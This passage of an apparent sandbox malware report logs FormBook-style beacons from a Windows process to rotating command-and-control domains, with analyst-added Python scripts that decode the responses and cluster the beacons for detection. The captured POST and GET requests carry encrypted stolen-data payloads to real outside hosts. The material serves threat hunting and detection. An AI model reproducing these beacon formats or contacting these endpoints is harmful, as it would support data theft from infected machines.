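    return struct.unpack("<II", member[-8:])


def decode_chunked_gzip(body: bytes, expected_plain: bytes = b"") -> dict:
    """Dechunk, read the gzip trailer, then try to inflate.

    The trailer alone gives the uncompressed size without inflating anything,
    and its CRC32 lets a suspected plaintext be confirmed or rejected.
    """
    member = dechunk(body)
    crc, isize = gzip_trailer(member)
    try:
        plain = zlib.decompress(member, 16 + zlib.MAX_WBITS)   # 16+ selects gzip framing
    except zlib.error:
        plain = None                                         # truncated or corrupt stream
    return {
        "chunk_len": len(member),
        "crc32": crc,
        "isize": isize,
        "body": plain,
        "matches_expected": bool(expected_plain) and len(expected_plain) == isize
                            and zlib.crc32(expected_plain) == crc,
    }


if __name__ == "__main__":
    r = decode_chunked_gzip(SESSION21_BODY, NGINX_404_BODY)
    print(f"gzip member: {r['chunk_len']} bytes, ISIZE={r['isize']}, CRC32=0x{r['crc32']:08x}")
    print("session-24 nginx page matches the trailer:", r["matches_expected"])
    if r["body"] is not None:
        print(r["body"].decode("ascii", "replace"))
```

The same dechunk-and-inspect step applies to sessions 22 and 23, whose "Data Raw" bytes are identical to session 21's. zlib in gzip mode verifies both the CRC32 and ISIZE on its own, so a non-None body is already a consistency-checked plaintext.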


                                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                 22 | 192.168.2.7 | 49994 | 172.67.192.207 | 80 | 7000 | C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
                                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                                 Dec 4, 2024 15:33:19.075531006 CET | 794 | OUT | POST /8292/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Host: www.3kw40881107247y.click
                                                                                Origin: http://www.3kw40881107247y.click
                                                                                Content-Length: 239
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.3kw40881107247y.click/8292/
                                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                Data Raw: 47 68 45 74 75 48 3d 51 6c 6f 33 79 73 42 71 65 6f 55 79 74 2f 74 73 71 36 4e 6f 66 56 41 55 32 4c 64 4e 6c 4c 35 44 52 31 53 5a 46 73 33 6e 6b 63 52 75 77 2f 4c 7a 52 64 62 74 78 43 30 2f 4d 75 6c 72 6e 51 48 4d 4e 73 36 59 6d 6a 4b 68 6d 30 45 51 33 76 62 33 51 67 6e 55 45 51 75 36 45 31 2b 35 34 49 70 76 6a 64 37 49 42 52 72 51 79 65 5a 51 2f 2f 79 52 41 6a 36 48 32 36 41 45 55 36 67 5a 73 65 78 77 63 6a 74 37 2b 65 72 44 77 41 6b 53 63 4b 45 6c 76 5a 4c 4d 69 37 53 37 65 6a 51 4b 6f 63 6c 38 50 6d 38 56 4b 59 33 58 52 4f 5a 35 4e 4d 33 58 4c 75 2b 64 46 38 5a 38 6b 37 6d 78 37 53 6c 56 76 32 62 59 55 2f 65 67 70 69 69 79 6f 57 64 59 78 6b 68 4d 51 67 52 66 43 6b 6d 4e 4a 5a 34 35 67 6a 45 65 34 74 67 3d
                                                                                Data Ascii: GhEtuH=Qlo3ysBqeoUyt/tsq6NofVAU2LdNlL5DR1SZFs3nkcRuw/LzRdbtxC0/MulrnQHMNs6YmjKhm0EQ3vb3QgnUEQu6E1+54Ipvjd7IBRrQyeZQ//yRAj6H26AEU6gZsexwcjt7+erDwAkScKElvZLMi7S7ejQKocl8Pm8VKY3XROZ5NM3XLu+dF8Z8k7mx7SlVv2bYU/egpiiyoWdYxkhMQgRfCkmNJZ45gjEe4tg=
                                                                                 Dec 4, 2024 15:33:20.113285065 CET | 929 | IN | HTTP/1.1 404 Not Found
                                                                                Date: Wed, 04 Dec 2024 14:33:19 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                CF-Cache-Status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U38n6HSzl%2B1frqxmeiaxLCRCq8mwJ4UmeYPgrtmXUuk%2BootiumRM2XGx9aYD%2FyywcT1mXotLo%2Ba74nBovt%2BhkTwcvAL5yOC5BCgKCojzl9aFhTJVG%2FlULfaoaM7cakjUTq7HfA1sEIL0tCiu"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8ecc82cb4b007c7c-EWR
                                                                                Content-Encoding: gzip
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2127&min_rtt=2127&rtt_var=1063&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=794&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30


                                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                 23 | 192.168.2.7 | 49995 | 172.67.192.207 | 80 | 7000 | C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
                                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                                 Dec 4, 2024 15:33:21.847820044 CET | 1807 | OUT | POST /8292/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Host: www.3kw40881107247y.click
                                                                                Origin: http://www.3kw40881107247y.click
                                                                                Content-Length: 1251
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.3kw40881107247y.click/8292/
                                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                Data Raw: 47 68 45 74 75 48 3d 51 6c 6f 33 79 73 42 71 65 6f 55 79 74 2f 74 73 71 36 4e 6f 66 56 41 55 32 4c 64 4e 6c 4c 35 44 52 31 53 5a 46 73 33 6e 6b 63 5a 75 77 4d 44 7a 51 2b 7a 74 79 43 30 2f 50 75 6c 6d 6e 51 48 4e 4e 74 54 77 6d 6a 58 63 6d 32 4d 51 32 4e 6a 33 56 55 7a 55 58 77 75 36 47 31 2b 34 6d 34 70 41 6a 5a 66 45 42 52 37 51 79 65 5a 51 2f 39 71 52 4a 57 4f 48 6c 71 41 4c 65 61 67 56 37 75 78 59 63 69 46 46 2b 65 2f 54 77 77 45 53 63 75 6f 6c 2f 37 54 4d 74 37 53 35 53 44 51 6f 6f 63 35 64 50 6d 68 75 4b 59 44 74 52 4e 35 35 4f 62 71 51 52 73 4b 32 52 75 42 79 6c 70 43 4f 31 41 39 59 71 6e 76 63 53 73 69 53 6b 56 58 4d 70 6b 39 76 37 7a 49 4e 43 6d 63 76 45 57 6d 74 45 4a 64 67 38 79 4d 5a 73 61 69 30 4d 75 58 48 6e 38 66 52 58 34 30 42 71 61 4b 69 70 59 53 54 57 4f 79 79 35 67 36 58 6c 46 66 4b 71 64 66 35 36 73 39 68 77 48 76 6b 4b 64 4e 63 75 43 56 67 48 51 4b 6a 31 37 78 4e 52 44 6f 52 4b 64 4c 46 2b 67 4a 4b 67 46 52 75 45 4f 38 58 6b 78 58 66 6e 73 31 4f 73 72 31 66 67 36 6e 59 71 34 67 [TRUNCATED]
                                                                                 Data Ascii: GhEtuH= [TRUNCATED]
                                                                                 Dec 4, 2024 15:33:22.907182932 CET | 927 | IN | HTTP/1.1 404 Not Found
                                                                                Date: Wed, 04 Dec 2024 14:33:22 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                CF-Cache-Status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K0EewMiMVQtNSCgy83Qg%2BUQhRNaGDrPSoEYTBWG98HIk8%2FnLYcz8F2TX13Juf0EH%2FwfyQok70AT%2BqrWwyWMOveqm0Tv9gI6OZGmE1jQntXPfw74rY6dbkv64A9JAet8P3STydcOIv%2B0G7Zxv"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8ecc82dd0c593308-EWR
                                                                                Content-Encoding: gzip
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1880&min_rtt=1880&rtt_var=940&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1807&delivery_rate=0&cwnd=103&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30


                                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                 24 | 192.168.2.7 | 49996 | 172.67.192.207 | 80 | 7000 | C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
                                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                                 Dec 4, 2024 15:33:24.527251959 CET | 499 | OUT | GET /8292/?GhEtuH=dnAXxbFHa6RK1uN3p+sQJBgkj7tI4LA3ZFKVH8On554fy+qRTfvRsSc0GNZ8hi+JaenG7xaf5F4Z1N3TeCmANQO8Fwm04ZJnyd/RH1yf5K4Kkfm0UhvZq/AJXt0L6OF1dgVk5sLd5yBY&9hy=gvrDS8U8OP HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Host: www.3kw40881107247y.click
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                 Dec 4, 2024 15:33:25.701351881 CET | 941 | IN | HTTP/1.1 404 Not Found
                                                                                Date: Wed, 04 Dec 2024 14:33:25 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                CF-Cache-Status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E1QepsJyypTd6SyQGDFv4Te9O2Bci67NIyJg1MZQhR8KcrN4ChTyHTIm0cwg1mVKqOR1hOS%2FicDonJafgnttYk38GVK221eEpgEiU5TNEK0QZfCeLRD6lt99o5AvTd4ZN9ONW%2Fazn%2FRC%2FBWR"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8ecc82ee79e5436d-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=23537&min_rtt=23537&rtt_var=11768&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=499&delivery_rate=0&cwnd=157&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
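
Sessions 20 through 26 show the sample rotating through three hosts (www.everythlngict.org, www.3kw40881107247y.click, www.futurorks.xyz) while everything else stays constant: an Android 4.3 browser User-Agent sent by a Windows process, one fixed path per host, a GET whose query carries a base64 blob under the field GhEtuH plus a fixed second field 9hy=gvrDS8U8OP, and POSTs to the same path with GhEtuH as the only form field. Those constants, not the domains, are what an analyst pivots on. The script below is an added example, not part of the report and not the malware's own code: it parses the four requests transcribed from sessions 20, 21, 24 and 25, checks each POST's Content-Length against its body, base64-decodes the payload field (the result is still FormBook's encrypted blob; no cipher or key is assumed here) and groups the beacons by the field name and User-Agent they share. The report's byte counts for the four requests (495, 774, 499, 750) are used as a check on the transcription.

```python
"""Parse the FormBook-style beacons captured in sessions 20, 21, 24 and 25.

Added example, not part of the Joe Sandbox report and not the malware's code.
Requests are transcribed from the sessions above; the payload is only
base64-decoded and stays encrypted.
"""
import base64
from collections import defaultdict

UA = ("Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) "
      "AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30")
ACCEPT = "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"


def _request(lines, body=b""):
    # Reassemble a raw HTTP/1.1 request from captured header lines and body.
    return "\r\n".join(lines).encode("latin-1") + b"\r\n\r\n" + body


def _get(host, path, query):
    # Header set and order exactly as captured in the GET sessions.
    return _request([f"GET {path}?{query} HTTP/1.1", ACCEPT, "Accept-Language: en-US,en;q=0.5",
                     f"Host: {host}", "Connection: close", "User-Agent: " + UA])


def _post(host, path, declared_len, body):
    # Header set and order exactly as captured in the POST sessions.
    return _request([f"POST {path} HTTP/1.1", ACCEPT, "Accept-Encoding: gzip, deflate",
                     "Accept-Language: en-US,en;q=0.5", f"Host: {host}", f"Origin: http://{host}",
                     f"Content-Length: {declared_len}", "Cache-Control: no-cache",
                     "Connection: close", "Content-Type: application/x-www-form-urlencoded",
                     f"Referer: http://{host}{path}", "User-Agent: " + UA], body)


SESSION20_GET = _get("www.everythlngict.org", "/hxjq/",
    "GhEtuH=BKNo6O8yWzEApXpxZdhvBLsS4mUhkJt064RYd0HbUq7fKEZlE0/hsCP6DjMyuX8dqHZGPQa4k2P/eM3nbiU+NzaMvzu4IfNUiCKwEJ3hTOhx8HANTpWY2e8g5zzoSZCTjrGp61nu9rmD&9hy=gvrDS8U8OP")
SESSION21_POST = _post("www.3kw40881107247y.click", "/8292/", 219,
    b"GhEtuH=Qlo3ysBqeoUyue9spbNoIlAX1LdNqr5PR1WZFpO8kO1u+7Pze8btiy0/Y+khjQGONs3rmimhmwUQ3ur3TRnVEAu4RF+7m4pvjd7IBRv+yexQ/uCRBGOEqKALeagZ7ux0cjtd+f35wCcScOIlvoLPr7S9ajRvguQkW3JmCp/LL/QYI621RMyxbthHg5CHs04gt3fAZdqB2VHYlE8cnQ==")
SESSION24_GET = _get("www.3kw40881107247y.click", "/8292/",
    "GhEtuH=dnAXxbFHa6RK1uN3p+sQJBgkj7tI4LA3ZFKVH8On554fy+qRTfvRsSc0GNZ8hi+JaenG7xaf5F4Z1N3TeCmANQO8Fwm04ZJnyd/RH1yf5K4Kkfm0UhvZq/AJXt0L6OF1dgVk5sLd5yBY&9hy=gvrDS8U8OP")
SESSION25_POST = _post("www.futurorks.xyz", "/cpty/", 219,
    b"GhEtuH=IMC/sGb12BVgaNb4k7RUifkUaKYmf5Qakilz9+2bsfy86rXTt3Vmxl96nbcUorL6jvgoV4x8hECzl3Q5vCW37hVL+sBaZ1ci4ZhafOphcHk2UReHq7N/qvzoxRT85skCuiacBCnvA0NinvXZ+D8E70IhXH+xAX9kE7/biLewsT69vnGJ2rh7Xl/4Vi59GlUa1FbbG2ajbc2On91lEA==")
CAPTURED = [SESSION20_GET, SESSION21_POST, SESSION24_GET, SESSION25_POST]


def parse_beacon(raw: bytes) -> dict:
    """Split one captured request into the fields that identify the beacon family."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    path, _, query = target.partition("?")
    if method == "POST":
        declared = int(headers.get("content-length", "0"))
        if declared != len(body):      # truncated capture or bad transcription
            raise ValueError(f"Content-Length {declared} but body is {len(body)} bytes")
        fields = body.decode("latin-1")
    else:
        fields = query
    # Not urllib.parse.parse_qs: it would turn '+' into a space and corrupt the
    # base64 payload, which this sample sends without URL-encoding.
    kv = dict(pair.partition("=")[::2] for pair in fields.split("&") if pair)
    param, value = next(iter(kv.items()))       # first field carries the payload
    payload = base64.b64decode(value + "=" * (-len(value) % 4))
    return {"method": method, "host": headers["host"], "path": path, "param": param,
            "payload_len": len(payload), "ua": headers.get("user-agent", ""),
            "extra": {k: v for k, v in kv.items() if k != param}}


def cluster(beacons):
    """Group by (payload field name, User-Agent): the two constants that survive
    this sample's domain rotation and so make a usable hunting pivot."""
    groups = defaultdict(set)
    for b in beacons:
        groups[(b["param"], b["ua"])].add(b["host"] + b["path"])
    return {key: sorted(targets) for key, targets in groups.items()}


if __name__ == "__main__":
    parsed = [parse_beacon(r) for r in CAPTURED]
    for b in parsed:
        print(f"{b['method']:4} {b['host']}{b['path']} {b['param']}={b['payload_len']}B {b['extra']}")
    for (param, _ua), targets in cluster(parsed).items():
        print(f"pivot on field {param!r}: {targets}")
```

Both GET beacons decode to 105-byte payloads and both 219-byte POSTs to 157 bytes, which is the kind of fixed-size regularity a detection should key on alongside the Android User-Agent from a Windows host. The decoded bytes are not inspected further: the report gives no key material, and the example does not pretend to have any.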


                                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                 25 | 192.168.2.7 | 49997 | 203.161.43.228 | 80 | 7000 | C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
                                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                                 Dec 4, 2024 15:33:31.352577925 CET | 750 | OUT | POST /cpty/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Host: www.futurorks.xyz
                                                                                Origin: http://www.futurorks.xyz
                                                                                Content-Length: 219
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.futurorks.xyz/cpty/
                                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                Data Raw: 47 68 45 74 75 48 3d 49 4d 43 2f 73 47 62 31 32 42 56 67 61 4e 62 34 6b 37 52 55 69 66 6b 55 61 4b 59 6d 66 35 51 61 6b 69 6c 7a 39 2b 32 62 73 66 79 38 36 72 58 54 74 33 56 6d 78 6c 39 36 6e 62 63 55 6f 72 4c 36 6a 76 67 6f 56 34 78 38 68 45 43 7a 6c 33 51 35 76 43 57 33 37 68 56 4c 2b 73 42 61 5a 31 63 69 34 5a 68 61 66 4f 70 68 63 48 6b 32 55 52 65 48 71 37 4e 2f 71 76 7a 6f 78 52 54 38 35 73 6b 43 75 69 61 63 42 43 6e 76 41 30 4e 69 6e 76 58 5a 2b 44 38 45 37 30 49 68 58 48 2b 78 41 58 39 6b 45 37 2f 62 69 4c 65 77 73 54 36 39 76 6e 47 4a 32 72 68 37 58 6c 2f 34 56 69 35 39 47 6c 55 61 31 46 62 62 47 32 61 6a 62 63 32 4f 6e 39 31 6c 45 41 3d 3d
                                                                                Data Ascii: GhEtuH=IMC/sGb12BVgaNb4k7RUifkUaKYmf5Qakilz9+2bsfy86rXTt3Vmxl96nbcUorL6jvgoV4x8hECzl3Q5vCW37hVL+sBaZ1ci4ZhafOphcHk2UReHq7N/qvzoxRT85skCuiacBCnvA0NinvXZ+D8E70IhXH+xAX9kE7/biLewsT69vnGJ2rh7Xl/4Vi59GlUa1FbbG2ajbc2On91lEA==
                                                                                 Dec 4, 2024 15:33:32.682960033 CET | 658 | IN | HTTP/1.1 404 Not Found
                                                                                Date: Wed, 04 Dec 2024 14:33:32 GMT
                                                                                Server: Apache
                                                                                Content-Length: 514
                                                                                Connection: close
                                                                                Content-Type: text/html
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e [TRUNCATED]
Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>


Session ID: 26
Source IP: 192.168.2.7
Source Port: 49998
Destination IP: 203.161.43.228
Destination Port: 80
PID: 7000
Process: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
Timestamp: Dec 4, 2024 15:33:34.035279989 CET
Bytes transferred: 770
Direction: OUT
Data:
POST /cpty/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.5
Host: www.futurorks.xyz
Origin: http://www.futurorks.xyz
Content-Length: 239
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.futurorks.xyz/cpty/
User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Data Ascii: GhEtuH=IMC/sGb12BVgYuD4jsNU1PkXVqYmRpQkki5z98axspa86LnTu2Vm8F96t7cVsrLxjvlCV858hEGzlys5vUe0pBVNrcBUd1ci4ZhafO9LcDI2UAuHsqN8jPzr5xT8o8kGuiaqBH+yAyJinqrZ/S8H10JkJ3+uAkMxbJjen5LvlRmDqRHrsJtXJ0HDRgdLRDJv3EfDLUuCErTkqvUhS7nFvgvMNXl+NgCr8IPDaBQ=
Timestamp: Dec 4, 2024 15:33:35.249555111 CET
Bytes transferred: 658
Direction: IN
Data:
HTTP/1.1 404 Not Found
Date: Wed, 04 Dec 2024 14:33:35 GMT
Server: Apache
Content-Length: 514
Connection: close
Content-Type: text/html
Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>


Session ID: 27
Source IP: 192.168.2.7
Source Port: 49999
Destination IP: 203.161.43.228
Destination Port: 80
PID: 7000
Process: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
Timestamp: Dec 4, 2024 15:33:36.712016106 CET
Bytes transferred: 1783
Direction: OUT
Data:
POST /cpty/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.5
Host: www.futurorks.xyz
Origin: http://www.futurorks.xyz
Content-Length: 1251
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.futurorks.xyz/cpty/
User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Timestamp: Dec 4, 2024 15:33:37.931548119 CET
Bytes transferred: 658
Direction: IN
Data:
HTTP/1.1 404 Not Found
Date: Wed, 04 Dec 2024 14:33:37 GMT
Server: Apache
Content-Length: 514
Connection: close
Content-Type: text/html
Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>


Session ID: 28
Source IP: 192.168.2.7
Source Port: 50000
Destination IP: 203.161.43.228
Destination Port: 80
PID: 7000
Process: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
Timestamp: Dec 4, 2024 15:33:39.373671055 CET
Bytes transferred: 491
Direction: OUT
Data:
GET /cpty/?GhEtuH=FOqfvw/D9TxLZ9zn5tlxjpsMOed4GZEMgX1z5u2hu/q28qXHvFp93Fs8lYoTq8WZ051sNJVY/UqOjH0F7ziUmXJv/tNxSQB91KtCf68XTy52NA+Nrb8mvfzj4zmGoOcEjhOtBV7kDBoK&9hy=gvrDS8U8OP HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Host: www.futurorks.xyz
Connection: close
